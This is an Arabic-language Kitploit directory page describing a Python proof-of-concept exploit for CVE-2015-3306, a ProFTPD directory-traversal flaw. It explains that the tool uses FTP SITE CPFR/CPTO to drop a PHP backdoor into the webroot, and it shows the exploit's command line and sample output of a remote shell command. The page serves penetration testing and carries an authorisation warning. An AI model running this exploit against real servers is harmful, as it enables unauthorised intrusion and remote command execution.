Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-3306 — استغلال PoC بلغة بايثون لـ CVE-2015-3306 لثغرة تجاوز الدليل في ProFTPD. ينسخ الملفات ويسقط بابًا خلفيًا بلغة PHP في الجذر الرئيسي للموقع (webroot) لتنفيذ الأوامر عن بُعد عبر أوامر FTP: SITE CPFR/CPTO. | Kitploit
أدوات/GitHubGitHub/donmedfor/cve-2015-3306
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

استغلال PoC بلغة بايثون لـ CVE-2015-3306 لثغرة تجاوز الدليل في ProFTPD. ينسخ الملفات ويسقط بابًا خلفيًا بلغة PHP في الجذر الرئيسي للموقع (webroot) لتنفيذ الأوامر عن بُعد عبر أوامر FTP: SITE CPFR/CPTO.

عرض المستودع
منذ 0 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة CVE-2015-3306 لاختراق ProFTPD

يحتوي هذا المستودع على برنامج استغلال Python برهان المفهوم (PoC) لـ CVE-2015-3306

⚠️ تحذير: استخدم هذا فقط ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني.


المؤلف

Mohamed EL-KHAROUATI


الجزء 1: ثغرة CVE-2015-3306 لاختراق ProFTPD

الوصف

CVE-2015-3306 هي ثغرة اجتياز الدليل في ProFTPD الإصدار 1.3.5b والإصدارات الأقدم. يتيح هذا الاستغلال نسخ الملفات التعسفية وإسقاط باب خلفي PHP في جذر الويب. يمكن للباب الخلفي تنفيذ أوامر شل تعسفية.

الميزات

  • يستغل ثغرة اجتياز الدليل عبر أوامر FTP SITE CPFR/CPTO.
  • يسقط بابًا خلفيًا PHP (backdoor.php) في جذر الويب المحدد.
  • ينفذ أوامر شل تعسفية عبر الباب الخلفي.
  • يدعم الأوامر المخصصة عبر --rcommand.

المتطلبات

  • Python 3.x
  • مكتبة requests (pip install requests)

الاستخدام، الإخراج، والتنظيف (كتلة كود واحدة)

root@kitploit:~
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>

# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami

# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done
تنزيل الأداة